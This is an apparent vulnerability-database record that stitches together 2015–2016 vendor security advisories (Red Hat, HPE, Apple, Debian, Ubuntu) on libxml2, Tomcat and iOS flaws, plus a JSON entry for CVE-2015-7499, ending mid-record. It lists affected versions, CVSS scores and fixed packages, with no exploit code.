It was found that Tomcat could reveal the presence of a directory even when that directory was protected by a security constraint. A user could make a request to a directory via a URL not ending with a slash and, depending on whether Tomcat redirected that request, could confirm whether that directory existed. (CVE-2015-5345)
-
It was found that Tomcat allowed the StatusManagerServlet to be loaded by a web application when a security manager was configured. This allowed a web application to list all deployed web applications and expose sensitive information such as session IDs. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing Red Hat JBoss Web Server installation (including all applications and configuration files).
After installing the updated packages, the httpd daemon will be restarted automatically. JIRA issues fixed (https://issues.jboss.org/):
JWS-271 - User submitted session ID JWS-272 - User submitted session ID JWS-276 - Welcome File processing refactoring - CVE-2015-5345 low JWS-277 - Welcome File processing refactoring - CVE-2015-5345 low JWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate JWS-304 - Restrict another manager servlet - CVE-2016-0706 low JWS-349 - Session serialization safety - CVE-2016-0714 moderate JWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n a-c04944172
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04944172 Version: 1
HPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager running libXML2, Remote or Local Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
References:
- CVE-2015-5312
- CVE-2015-7497
- CVE-2015-7498
- CVE-2015-7499
- CVE-2015-7500
- CVE-2015-7941
- CVE-2015-7942
- CVE-2015-8241
- CVE-2015-8242
- CVE-2015-8317
- PSRT110015
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- IceWall File Manager 3.0
- IceWall Federation Agent 3.0
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 CVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2015-8241 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2015-8242 (AV:N/AC:M/Au:N/C:P/I:N/A:P) 5.8 CVE-2015-8317 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HPE recommends applying the latest OS vendor security patches for libXML2 to resolve the vulnerabilities in the libXML2 library.
Please note that the HP IceWall product is only available in Japan.
HISTORY Version:1 (rev.1) - 22 January 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HPE Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hpe.com.
Report: To report a potential security vulnerability with any HPE supported product, send Email to: security-alert@hpe.com
Subscribe: To initiate a subscription to receive future HPE Security Bulletin alerts via Email: http://www.hpe.com/support/Subscriber_Choice
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://www.hpe.com/support/Security_Bulletin_Archive
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HPE General Software HF = HPE Hardware and Firmware MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PV = ProCurve ST = Storage Software UX = HP-UX
Copyright 2016 Hewlett Packard Enterprise
Hewlett Packard Enterprise shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett Packard Enterprise and the names of Hewlett Packard Enterprise products referenced herein are trademarks of Hewlett Packard Enterprise in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
For the oldstable distribution (wheezy), these problems have been fixed in version 2.8.0+dfsg1-7+wheezy5.
For the stable distribution (jessie), these problems have been fixed in version 2.9.1+dfsg1-5+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions.
For the unstable distribution (sid), these problems have been fixed in version 2.9.3+dfsg1-1 or earlier versions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: libxml2 security update Advisory ID: RHSA-2015:2550-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2550.html Issue date: 2015-12-07 CVE Names: CVE-2015-1819 CVE-2015-5312 CVE-2015-7497 CVE-2015-7498 CVE-2015-7499 CVE-2015-7500 CVE-2015-7941 CVE-2015-7942 CVE-2015-8241 CVE-2015-8242 CVE-2015-8317 =====================================================================
- Summary:
Updated libxml2 packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Several denial of service flaws were found in libxml2, a library providing support for reading, modifying, and writing XML and HTML files. A remote attacker could provide a specially crafted XML or HTML file that, when processed by an application using libxml2, would cause that application to use an excessive amount of CPU, leak potentially sensitive information, or in certain cases crash the application. (CVE-2015-1819, CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500 CVE-2015-7941, CVE-2015-7942, CVE-2015-8241, CVE-2015-8242, CVE-2015-8317, BZ#1213957, BZ#1281955)
Red Hat would like to thank the GNOME project for reporting CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-8241, CVE-2015-8242, and CVE-2015-8317. Upstream acknowledges Kostya Serebryany of Google as the original reporter of CVE-2015-7497, CVE-2015-7498, CVE-2015-7499, and CVE-2015-7500; Hugh Davenport as the original reporter of CVE-2015-8241 and CVE-2015-8242; and Hanno Boeck as the original reporter of CVE-2015-8317. The CVE-2015-1819 issue was discovered by Florian Weimer of Red Hat Product Security.
All libxml2 users are advised to upgrade to these updated packages, which contain a backported patch to correct these issues. The desktop must be restarted (log out, then log back in) for this update to take effect.
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
aarch64: libxml2-2.9.1-6.el7_2.2.aarch64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-devel-2.9.1-6.el7_2.2.aarch64.rpm libxml2-python-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-2.9.1-6.el7_2.2.ppc.rpm libxml2-2.9.1-6.el7_2.2.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-devel-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-python-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7_2.2.s390.rpm libxml2-2.9.1-6.el7_2.2.s390x.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-devel-2.9.1-6.el7_2.2.s390.rpm libxml2-devel-2.9.1-6.el7_2.2.s390x.rpm libxml2-python-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: libxml2-debuginfo-2.9.1-6.el7_2.2.aarch64.rpm libxml2-static-2.9.1-6.el7_2.2.aarch64.rpm
ppc64: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64.rpm libxml2-static-2.9.1-6.el7_2.2.ppc.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7_2.2.ppc64le.rpm libxml2-static-2.9.1-6.el7_2.2.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7_2.2.s390.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.s390x.rpm libxml2-static-2.9.1-6.el7_2.2.s390.rpm libxml2-static-2.9.1-6.el7_2.2.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7_2.2.src.rpm
x86_64: libxml2-2.9.1-6.el7_2.2.i686.rpm libxml2-2.9.1-6.el7_2.2.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-devel-2.9.1-6.el7_2.2.i686.rpm libxml2-devel-2.9.1-6.el7_2.2.x86_64.rpm libxml2-python-2.9.1-6.el7_2.2.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7_2.2.i686.rpm libxml2-debuginfo-2.9.1-6.el7_2.2.x86_64.rpm libxml2-static-2.9.1-6.el7_2.2.i686.rpm libxml2-static-2.9.1-6.el7_2.2.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-1819 https://access.redhat.com/security/cve/CVE-2015-5312 https://access.redhat.com/security/cve/CVE-2015-7497 https://access.redhat.com/security/cve/CVE-2015-7498 https://access.redhat.com/security/cve/CVE-2015-7499 https://access.redhat.com/security/cve/CVE-2015-7500 https://access.redhat.com/security/cve/CVE-2015-7941 https://access.redhat.com/security/cve/CVE-2015-7942 https://access.redhat.com/security/cve/CVE-2015-8241 https://access.redhat.com/security/cve/CVE-2015-8242 https://access.redhat.com/security/cve/CVE-2015-8317 https://access.redhat.com/security/updates/classification/#moderate
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . 6) - i386, x86_64
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
APPLE-SA-2016-03-21-1 iOS 9.3
iOS 9.3 is now available and addresses the following:
AppleUSBNetworking Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the parsing of data from USB devices. This issue was addressed through improved input validation. CVE-ID CVE-2016-1734 : Andrea Barisani and Andrej Rosano of Inverse Path
FontParser Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1740 : HappilyCoded (ant4g0nist and r3dsm0k3) working with Trend Micro's Zero Day Initiative (ZDI)
HTTPProtocol Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A remote attacker may be able to execute arbitrary code Description: Multiple vulnerabilities existed in nghttp2 versions prior to 1.6.0, the most serious of which may have led to remote code execution. These were addressed by updating nghttp2 to version 1.6.0. CVE-ID CVE-2015-8659
IOHIDFamily Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: A memory corruption issue was addressed through improved memory handling. CVE-ID CVE-2016-1748 : Brandon Azad
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to cause a denial of service Description: A denial of service issue was addressed through improved validation. CVE-ID CVE-2016-1752 : CESG
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A use after free issue was addressed through improved memory management. CVE-ID CVE-2016-1750 : CESG
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple integer overflows were addressed through improved input validation. CVE-ID CVE-2016-1753 : Juwei Lin Trend Micro working with Trend Micro's Zero Day Initiative (ZDI)
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to bypass code signing Description: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed through improved permission validation. CVE-ID CVE-2016-1751 : Eric Monti of Square Mobile Security
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A race condition existed during the creation of new processes. This was addressed through improved state handling. CVE-ID CVE-2016-1757 : Ian Beer of Google Project Zero and Pedro Vilaça
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: A null pointer dereference was addressed through improved input validation. CVE-ID CVE-2016-1756 : Lufeng Li of Qihoo 360 Vulcan Team
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1754 : Lufeng Li of Qihoo 360 Vulcan Team CVE-2016-1755 : Ian Beer of Google Project Zero
Kernel Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to determine kernel memory layout Description: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation. CVE-ID CVE-2016-1758 : Brandon Azad
LaunchServices Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An application may be able to modify events from other applications Description: An event handler validation issue existed in the XPC Services API. This issue was addressed through improved message validation. CVE-ID CVE-2016-1760 : Proteas of Qihoo 360 Nirvan Team
libxml2 Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted XML may lead to unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2015-1819 CVE-2015-5312 : David Drysdale of Google CVE-2015-7499 CVE-2015-7500 : Kostya Serebryany of Google CVE-2015-7942 : Kostya Serebryany of Google CVE-2015-8035 : gustavo.grieco CVE-2015-8242 : Hugh Davenport CVE-2016-1761 : wol0xff working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1762
Messages Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may auto-fill text into other Message threads Description: An issue existed in the parsing of SMS URLs. This issue was addressed through improved URL validation. CVE-ID CVE-2016-1763 : CityTog
Messages Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker who is able to bypass Apple's certificate pinning, intercept TLS connections, inject messages, and record encrypted attachment-type messages may be able to read attachments Description: A cryptographic issue was addressed by rejecting duplicate messages on the client. CVE-ID CVE-2016-1788 : Christina Garman, Matthew Green, Gabriel Kaptchuk, Ian Miers, and Michael Rushanan of Johns Hopkins University
Profiles Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An untrusted MDM profile may be incorrectly displayed as verified Description: A certificate validation issue existed in MDM profiles. This was addressed through additional checks. CVE-ID CVE-2016-1766 : Taylor Boyko working with Trend Micro's Zero Day Initiative (ZDI)
Security Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted certificate may lead to arbitrary code execution Description: A memory corruption issue existed in the ASN.1 decoder. This issue was addressed through improved input validation. CVE-ID CVE-2016-1950 : Francis Gabriel of Quarkslab
TrueTypeScaler Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2016-1775 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-ID CVE-2016-1778 : 0x1byte working with Trend Micro's Zero Day Initiative (ZDI) CVE-2016-1783 : Mihai Parparita of Google
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A website may be able to track sensitive user information Description: An issue existed in the handling of attachment URLs. This issue was addressed through improved URL handling. CVE-ID CVE-2016-1781 : Devdatta Akhawe of Dropbox, Inc.
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A website may be able to track sensitive user information Description: A hidden web page may be able to access device- orientation and device-motion data. This issue was addressed by suspending the availability of this data when the web view is hidden. CVE-ID CVE-2016-1780 : Maryam Mehrnezhad, Ehsan Toreini, Siamak F. Shahandashti, and Feng Hao of the School of Computing Science, Newcastle University, UK
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a maliciously crafted website may reveal a user's current location Description: An issue existed in the parsing of geolocation requests. This was addressed through improved validation of the security origin for geolocation requests. CVE-ID CVE-2016-1779 : xisigr of Tencent's Xuanwu Lab (http://www.tencent.com)
WebKit Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may be able to access restricted ports on arbitrary servers Description: A port redirection issue was addressed through additional port validation. CVE-ID CVE-2016-1782 : Muneaki Nishimura (nishimunea) of Recruit Technologies Co.,Ltd.
WebKit History Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash Description: A resource exhaustion issue was addressed through improved input validation. CVE-ID CVE-2016-1784 : Moony Li and Jack Tang of TrendMicro and 李普君 of 无声信息技术PKAV Team (PKAV.net)
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: Visiting a malicious website may lead to user interface spoofing Description: Redirect responses may have allowed a malicious website to display an arbitrary URL and read cached contents of the destination origin. This issue was addressed through improved URL display logic. CVE-ID CVE-2016-1786 : ma.la of LINE Corporation
WebKit Page Loading Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: A malicious website may exfiltrate data cross-origin Description: A caching issue existed with character encoding. This was addressed through additional request checking. CVE-ID CVE-2016-1785 : an anonymous researcher
Wi-Fi Available for: iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later Impact: An attacker with a privileged network position may be able to execute arbitrary code Description: A frame validation and memory corruption issue existed for a given ethertype. This issue was addressed through additional ethertype validation and improved memory handling. CVE-ID CVE-2016-0801 : an anonymous researcher CVE-2016-0802 : an anonymous researcher
Installation note:
This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from www.apple.com/itunes/
iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
- Navigate to Settings
- Select General
- Select About. The version after applying this update will be "9.3 ".
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org
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libxml2 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
libxml2 could be made to crash if it opened a specially crafted file. (CVE-2015-5312, CVE-2015-7497, CVE-2015-7498, CVE-2015-7499,CVE-2015-7500)
Hugh Davenport discovered that libxml2 incorrectly handled certain malformed documents. (CVE-2015-8241, CVE-2015-8242)
Hanno Boeck discovered that libxml2 incorrectly handled certain malformed documents. This issue only applied to Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-8317)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: libxml2 2.9.2+zdfsg1-4ubuntu0.2
Ubuntu 15.04: libxml2 2.9.2+dfsg1-3ubuntu0.2
Ubuntu 14.04 LTS: libxml2 2.9.1+dfsg1-3ubuntu4.6
Ubuntu 12.04 LTS: libxml2 2.7.8.dfsg-5.1ubuntu4.13
After a standard system update you need to reboot your computer to make all the necessary changes
Show details on source website{
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"id": "VHN-85460",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2015-7499",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-85460"
},
{
"db": "VULMON",
"id": "CVE-2015-7499"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-446"
},
{
"db": "JVNDB",
"id": "JVNDB-2015-006434"
},
{
"db": "NVD",
"id": "CVE-2015-7499"
}
]
},
"description": {
"_id": null,
"data": "Heap-based buffer overflow in the xmlGROW function in parser.c in libxml2 before 2.9.3 allows context-dependent attackers to obtain sensitive process memory information via unspecified vectors. Libxml2 is prone to a denial-of-service vulnerability. \nAn attacker can exploit this issue to crash the affected application; denying service to legitimate users. Due to the nature of this issue, code-execution may be possible but this has not been confirmed. \nLibxml2 2.9.2 and prior are vulnerable. It supports multiple encoding formats, XPath analysis, Well-formed and valid verification, etc. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library. \n\nThis release of Red Hat JBoss Web Server 3.0.3 serves as a replacement for\nRed Hat JBoss Web Server 3.0.2, and includes bug fixes and enhancements,\nwhich are documented in the Release Notes documented linked to in the\nReferences. (CVE-2015-5312,\nCVE-2015-7497, CVE-2015-7498, CVE-2015-7499, CVE-2015-7500, CVE-2015-7942,\nCVE-2015-8035, CVE-2015-8710, CVE-2015-7941, CVE-2015-8241, CVE-2015-8242,\nCVE-2015-8317)\n\n* A session fixation flaw was found in the way Tomcat recycled the\nrequestedSessionSSL field. If at least one web application was configured\nto use the SSL session ID as the HTTP session ID, an attacker could reuse a\npreviously used session ID for further requests. (CVE-2015-5346)\n\n* A CSRF flaw was found in Tomcat\u0027s the index pages for the Manager and\nHost Manager applications. These applications included a valid CSRF token\nwhen issuing a redirect as a result of an unauthenticated request to the\nroot of the web application. This token could then be used by an attacker\nto perform a CSRF attack. (CVE-2015-5351)\n\n* It was found that several Tomcat session persistence mechanisms could\nallow a remote, authenticated user to bypass intended SecurityManager\nrestrictions and execute arbitrary code in a privileged context via a web\napplication that placed a crafted object in a session. (CVE-2016-0714)\n\n* A security manager bypass flaw was found in Tomcat that could allow\nremote, authenticated users to access arbitrary application data,\npotentially resulting in a denial of service. (CVE-2016-0763)\n\n* A use-after-free flaw was found in the way OpenSSL imported malformed\nElliptic Curve private keys. (CVE-2015-0209)\n\n* It was found that Tomcat could reveal the presence of a directory even\nwhen that directory was protected by a security constraint. A user could\nmake a request to a directory via a URL not ending with a slash and,\ndepending on whether Tomcat redirected that request, could confirm whether\nthat directory existed. (CVE-2015-5345)\n\n* It was found that Tomcat allowed the StatusManagerServlet to be loaded by\na web application when a security manager was configured. This allowed a\nweb application to list all deployed web applications and expose sensitive\ninformation such as session IDs. Solution:\n\nThe References section of this erratum contains a download link (you must\nlog in to download the update). Before applying the update, back up your\nexisting Red Hat JBoss Web Server installation (including all applications\nand configuration files). \n\nAfter installing the updated packages, the httpd daemon will be restarted\nautomatically. JIRA issues fixed (https://issues.jboss.org/):\n\nJWS-271 - User submitted session ID\nJWS-272 - User submitted session ID\nJWS-276 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-277 - Welcome File processing refactoring - CVE-2015-5345 low\nJWS-303 - Avoid useless session creation for manager webapps - CVE-2015-5351 moderate\nJWS-304 - Restrict another manager servlet - CVE-2016-0706 low\nJWS-349 - Session serialization safety - CVE-2016-0714 moderate\nJWS-350 - Protect ResourceLinkFactory.setGlobalContext() - CVE-2016-0763 moderate\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hpe.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_n\na-c04944172\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04944172\nVersion: 1\n\nHPSBGN03537 rev.1 - HPE IceWall Federation Agent and IceWall File Manager\nrunning libXML2, Remote or Local Denial of Service (DoS)\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nReferences:\n\n - CVE-2015-5312\n - CVE-2015-7497\n - CVE-2015-7498\n - CVE-2015-7499\n - CVE-2015-7500\n - CVE-2015-7941\n - CVE-2015-7942\n - CVE-2015-8241\n - CVE-2015-8242\n - CVE-2015-8317\n - PSRT110015\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n - IceWall File Manager 3.0\n - IceWall Federation Agent 3.0\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-5312 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1\nCVE-2015-7497 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7498 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7499 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2015-7500 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2015-7941 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2015-7942 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 